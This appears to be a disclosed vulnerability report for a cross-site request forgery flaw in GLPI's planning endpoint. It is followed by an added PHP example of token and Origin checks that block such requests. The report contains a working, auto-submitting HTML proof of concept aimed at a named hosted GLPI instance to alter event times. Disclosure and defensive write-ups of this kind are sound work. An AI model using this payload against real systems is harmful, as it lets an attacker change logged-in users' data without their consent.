Cross-Site Request Forgery (CSRF) in glpi-project/glpi
Valid
Reported on Sep 13th 2021
✍️ Description
Hello dear GLPI team, I found one more CSRF vulnerability.
🕵️♂️ Proof of Concept
1. First, the user should already be logged in, in Firefox or Safari.
2. Open PoC.html and click on the submit button (it can also be auto-submitted).
3. Here the start and end times of a Planning with items_id 3 will be changed after clicking on the submit button in the PoC.html file.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://nocompany.with7.glpi-network.cloud/ajax/planning.php" method="POST">
<input type="hidden" name="action" value="update_event_times" />
<input type="hidden" name="start" value="2021-09-13T08:30:00.000Z" />
<input type="hidden" name="end" value="2021-09-13T12:00:00.000Z" />
<input type="hidden" name="itemtype" value="PlanningExternalEvent" />
<input type="hidden" name="items_id" value="3" />
<input type="hidden" name="move_instance" value="true" />
<input type="hidden" name="old_start" value="2021-09-13T08:30:00.000Z" />
<input type="hidden" name="new_actor_itemtype" value="" />
<input type="hidden" name="new_actor_items_id" value="" />
<input type="hidden" name="old_actor_itemtype" value="" />
<input type="hidden" name="old_actor_items_id" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
We have contacted a member of the glpi-project/glpi team and are waiting to hear back
2 years ago
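A server-side check that refuses the kind of forged POST shown in the PoC, as an added example that is not part of the original report and is not GLPI's own code. The function names, the `csrf_token` field name and both origins are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical names throughout; this is not GLPI's implementation.
const TRUSTED_ORIGIN = 'https://glpi.example.test'; // constructed placeholder origin

/** Issue a per-session token to embed in every state-changing form. */
function issue_csrf_token(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/** Return null when the request may proceed, or the reason it is rejected. */
function reject_reason(string $method, array $headers, array $post, array $session): ?string
{
    if (!in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'], true)) {
        return null; // safe methods must not change state, so there is nothing to check
    }
    // Modern browsers send Origin on cross-site form POSTs; a mismatch means
    // the form was submitted from another site.
    $origin = $headers['Origin'] ?? null;
    if ($origin !== null && $origin !== TRUSTED_ORIGIN) {
        return 'cross-origin request';
    }
    // The token lives in the session and in the legitimate form, never in a
    // cookie, so a third-party page cannot supply it.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// Constructed sample: fields the PoC form posts, with no token attached.
$session = [];
$token = issue_csrf_token($session);
$forged = ['action' => 'update_event_times', 'itemtype' => 'PlanningExternalEvent', 'items_id' => '3'];

// Cross-site submission carrying an Origin header: rejected on origin.
var_dump(reject_reason('POST', ['Origin' => 'https://other-site.example'], $forged, $session));
// Same fields with no Origin header: still rejected, because the token is absent.
var_dump(reject_reason('POST', [], $forged, $session));
// Legitimate same-origin form that includes the session token: accepted.
var_dump(reject_reason('POST', ['Origin' => TRUSTED_ORIGIN], $forged + ['csrf_token' => $token], $session));
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie is a complementary control, since it stops the browser from attaching the cookie to a cross-site form POST in the first place.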